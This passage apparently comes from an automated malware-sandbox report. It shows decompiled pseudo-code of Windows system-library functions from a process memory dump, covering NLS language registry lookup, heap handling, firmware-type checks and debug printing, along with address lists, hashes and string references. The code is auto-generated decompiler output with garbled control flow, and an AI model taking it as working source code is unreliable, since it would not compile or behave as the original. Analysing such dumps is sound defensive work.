				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0361F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E036595D0();
						}
						if(_t78 != 0) {
							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0365FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0365BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03659600();
					if(_t97 < 0) {
						goto L6;
					}
					E0365BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0361F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0365BB40(_t83, _t102 + 0x24, _t78);
								if(L036243C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0365BB40(_t84, _t102 + 0x24, _t94);
									if(L036243C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0361e620
0x0361e628
0x0361e62f
0x0361e631
0x0361e635
0x0361e637
0x0361e63e
0x03675503
0x03675503
0x0361e64c
0x0361e64c
0x0361e651
0x00000000
0x00000000
0x0361e661
0x0361e665
0x0367542a
0x0361e715
0x0361e71a
0x0361e71c
0x0361e720
0x0361e720
0x0361e727
0x0361e736
0x0361e736
0x0361e743
0x0361e743
0x0361e673
0x0361e678
0x0361e67d
0x0361e682
0x0361e685
0x0361e692
0x0361e69b
0x0361e6a3
0x0361e6ad
0x0361e6b1
0x0361e6b2
0x0361e6bb
0x0361e6bf
0x0361e6c0
0x0361e6c8
0x0361e6cc
0x0361e6d5
0x0361e6d9
0x00000000
0x00000000
0x0361e6e5
0x0361e6ea
0x0361e6f9
0x0361e70b
0x0361e70f
0x03675439
0x0367545e
0x0367545e
0x00000000
0x0367545e
0x0367543b
0x0367543e
0x03675440
0x03675445
0x03675472
0x03675475
0x0367548d
0x03675493
0x036754a9
0x00000000
0x00000000
0x036754ab
0x036754b4
0x036754bc
0x036754c8
0x036754de
0x036754fb
0x036754e0
0x036754e6
0x036754eb
0x036754eb
0x036754de
0x00000000
0x036754bc
0x03675477
0x0367547a
0x03675480
0x03675483
0x03675486
0x0367548b
0x00000000
0x00000000
0x00000000
0x0367548b
0x00000000
0x00000000
0x00000000
0x00000000
0x03675447
0x03675447
0x03675447
0x03675447
0x0367544e
0x00000000
0x00000000
0x03675450
0x03675452
0x03675455
0x0367545a
0x00000000
0x00000000
0x00000000
0x0367545c
0x0367546a
0x0367546d
0x0367546f
0x00000000
0x0367546f
0x0361e70f

Strings

InstallLanguageFallback, xrefs: 0361E6DB
@, xrefs: 0361E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0361E68C

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 37bc8447b1c1ce45841e8a4e567c5cfa23f9429f89b35d622b6f133ffa8ef8c8
Instruction ID: fbdd6a62a24a3a245dc3342513fbd7081497eca903a0932265fc2a9f0c5867f7
Opcode Fuzzy Hash: 37bc8447b1c1ce45841e8a4e567c5cfa23f9429f89b35d622b6f133ffa8ef8c8
Instruction Fuzzy Hash: 5D5101B65083059BD710DF65C444A6BB3E8BF89714F49096EFA86DB340FB30DA04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 036DE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E036DE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E036DBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E036DBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E036DAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E03659730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E036DA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E036DA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E03659730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E036DA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E036DA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E03632280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0362B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0362FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E03637D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E036CFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x036de547
0x036de549
0x036de54f
0x036de553
0x036de557
0x036de55a
0x036de55c
0x036de55f
0x036de561
0x036de567
0x036de56b
0x036de7e2
0x00000000
0x036de571
0x036de575
0x036de577
0x036de57b
0x036de57c
0x036de57d
0x036de57e
0x036de57f
0x036de588
0x036de58f
0x036de591
0x036de592
0x036de592
0x036de596
0x036de59e
0x036de5a0
0x036de5a6
0x036de61d
0x036de61d
0x036de621
0x036de623
0x036de630
0x036de630
0x036de7e6
0x036de7eb
0x036de7ed
0x036de7f4
0x036de7fa
0x036de7ff
0x036de7ff
0x036de80a
0x036de812
0x036de812
0x036de5ab
0x036de5b4
0x036de5b9
0x036de5be
0x036de5c0
0x036de5c2
0x036de5c8
0x036de5c9
0x036de5cb
0x036de5cc
0x036de5d5
0x036de5e4
0x036de5f1
0x036de5f8
0x036de5f8
0x036de5d5
0x036de602
0x036de616
0x036de63d
0x036de644
0x036de64d
0x036de652
0x036de657
0x036de659
0x036de65b
0x036de661
0x036de662
0x036de664
0x036de665
0x036de66e
0x036de67d
0x036de68a
0x036de691
0x036de691
0x036de66e
0x036de6b0
0x00000000
0x036de6b6
0x036de6bd
0x036de6c7
0x036de6d7
0x036de6d9
0x036de6db
0x036de6de
0x036de6e3
0x036de6f3
0x036de6fc
0x036de700
0x036de700
0x036de704
0x036de70a
0x036de70a
0x036de713
0x036de716
0x036de719
0x036de720
0x036de761
0x036de76b
0x036de774
0x036de77a
0x036de77a
0x036de78a
0x036de791
0x036de799
0x036de79b
0x036de79f
0x036de7aa
0x036de7c0
0x036de7ac
0x036de7b2
0x036de7b9
0x036de7b9
0x036de7c7
0x036de806
0x00000000
0x036de7c9
0x036de7d1
0x036de7d8
0x00000000
0x036de7d8
0x00000000
0x00000000
0x036de722
0x036de72e
0x036de748
0x036de74c
0x036de754
0x036de756
0x036de75c
0x036de75c
0x00000000
0x036de75c
0x036de758
0x036de758
0x00000000
0x036de758
0x036de750
0x00000000
0x00000000
0x036de752
0x00000000
0x036de752
0x036de730
0x036de735
0x036de73d
0x036de73f
0x00000000
0x00000000
0x036de741
0x036de741
0x00000000
0x036de741
0x036de739
0x00000000
0x00000000
0x036de73b
0x00000000
0x036de73b
0x036de722
0x036de720
0x036de6b0
0x036de618
0x00000000
0x036de618

Strings

`, xrefs: 036DE670
`, xrefs: 036DE5D7

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: d275094f41f98d7e18a0ef2bcc9d128ed5e02f87959620fa173cb5b8b87e8a22
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 0291AE31A047419FE764CE25C944B2BBBE5BF84714F18892DF999CF280E776E804CB56

Uniqueness

Uniqueness Score: -1.00%

Function 036951BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E036951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x36f05f0);
				E0366D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0362EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E036953CA(0);
						return E0366D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0365F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03633690(1, _t117, 0x35f1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0365AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03634620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0365AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0369500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03659860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x036951be
0x036951c3
0x036951c8
0x036951cd
0x036951d0
0x036951d3
0x036951d8
0x036951db
0x036951de
0x036951e0
0x036951e3
0x036951e6
0x036951e8
0x03695342
0x03695351
0x03695356
0x0369535a
0x03695360
0x03695363
0x03695366
0x03695369
0x03695369
0x0369536b
0x0369536b
0x03695370
0x036953a3
0x036953a4
0x036953a6
0x036953ab
0x036953ab
0x036953ae
0x036953ae
0x036953b5
0x036953bf
0x036953bf
0x03695375
0x03695396
0x036953a0
0x036953a0
0x00000000
0x03695396
0x03695377
0x03695379
0x0369537f
0x0369538c
0x03695390
0x00000000
0x03695390
0x036951ee
0x036951f1
0x03695301
0x03695310
0x03695315
0x03695318
0x0369531b
0x03695320
0x0369532e
0x03695331
0x00000000
0x03695331
0x03695328
0x03695329
0x00000000
0x03695329
0x036951fa
0x03695235
0x03695236
0x03695239
0x0369523f
0x03695240
0x03695241
0x03695242
0x03695246
0x03695247
0x0369524e
0x03695251
0x03695267
0x03695269
0x0369526e
0x0369527d
0x0369527e
0x03695281
0x03695282
0x03695287
0x03695288
0x0369528a
0x0369528f
0x03695294
0x00000000
0x00000000
0x0369529a
0x0369529c
0x0369529e
0x0369529e
0x036952a4
0x036952b0
0x00000000
0x00000000
0x036952ba
0x036952bc
0x036952bc
0x036952d4
0x036952d9
0x036952dc
0x036952e1
0x00000000
0x00000000
0x036952e7
0x036952f4
0x00000000
0x036952f4
0x03695270
0x00000000
0x03695270
0x036951fc
0x036951fd
0x03695202
0x03695203
0x03695205
0x0369520a
0x0369520f
0x00000000
0x00000000
0x0369521b
0x03695226
0x0369522b
0x0369521d
0x0369521d
0x03695222
0x03695222
0x0369522d
0x00000000

Strings

Legacy, xrefs: 03695226
UEFI, xrefs: 0369521D

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 429099e7d1f959c8305e4bd2fca6679ea2385c08b0b15d03ddd48e55166f94f1
Instruction ID: 5f47a5a330b2de4e4906b53e4756c423fea8f82d572cacd0b576e9252fb9ceb6
Opcode Fuzzy Hash: 429099e7d1f959c8305e4bd2fca6679ea2385c08b0b15d03ddd48e55166f94f1
Instruction Fuzzy Hash: 32514E71E007099FEF15DFA8C950AADBBF8BB49700F14406EE64AEB251E7719901CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0361B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0361B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x36ef7a8);
				E0366D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0366D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0365D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0365F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0366DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0365B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0365B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0365E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0365A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0361b171
0x0361b171
0x0361b171
0x0361b171
0x0361b171
0x0361b176
0x0361b17b
0x0361b180
0x0361b186
0x0361b18f
0x0361b198
0x0361b1a4
0x0361b1aa
0x03674802
0x03674802
0x03674805
0x0367480c
0x0367480e
0x0361b1d1
0x0361b1d3
0x0361b1de
0x0361b1de
0x03674817
0x0367481e
0x03674820
0x03674822
0x03674822
0x03674824
0x03674824
0x0367482a
0x00000000
0x00000000
0x03674835
0x0367483a
0x0367483d
0x0367483f
0x03674842
0x03674842
0x03674842
0x03674846
0x0367484c
0x0367484e
0x03674851
0x03674851
0x03674853
0x03674854
0x03674854
0x03674858
0x0367485a
0x0367485a
0x0367485d
0x0367485f
0x03674861
0x03674861
0x03674866
0x0367486b
0x0367486e
0x03674871
0x03674876
0x03674876
0x03674878
0x0367487b
0x03674884
0x03674884
0x00000000
0x0367487d
0x0367487d
0x03674882
0x03674889
0x03674889
0x0367488f
0x03674891
0x036748e0
0x036748e2
0x036748e4
0x036748e4
0x036748e7
0x036748e7
0x036748ed
0x036748f4
0x036748f6
0x03674951
0x03674951
0x03674953
0x03674953
0x03674956
0x03674956
0x03674958
0x03674959
0x03674959
0x0367495d
0x0367495d
0x0367495f
0x0367495f
0x03674965
0x03674969
0x036749ba
0x036749ba
0x036749c1
0x036749c5
0x036749cc
0x036749d4
0x036749d7
0x036749da
0x036749e4
0x036749e5
0x036749f3
0x03674a02
0x00000000
0x03674a02
0x03674972
0x03674974
0x00000000
0x00000000
0x03674976
0x03674979
0x03674982
0x03674983
